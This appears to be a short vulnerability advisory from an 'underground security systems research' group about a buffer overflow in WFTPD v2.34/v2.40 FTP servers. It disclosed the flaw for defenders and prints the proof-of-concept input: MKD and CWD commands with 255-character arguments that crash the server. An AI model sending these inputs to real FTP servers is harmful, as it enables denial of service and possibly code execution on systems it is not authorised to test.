u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h

WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability

WFTPD v2.34,v2.40 Server	WFTPD v2.40 - Winsock FTP Server.
	Problem: We found in the WFTPD v2.34,v2.40 server and earlier a vulnerable to remotely exploitable buffer overflow. This can result in a denial of service and at worst in arbitrary code being executed on the system. The vulnerabilities are the conjunction of two large commands the MKD and CWD if they are passed an argument a string exact of 255 characters, If this 2 large commands are passed in order program crash. Tested in: Windows 98 / Windows Nt Example: First command MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaa Second command CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaa Crash.....Overflow. Published by: u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h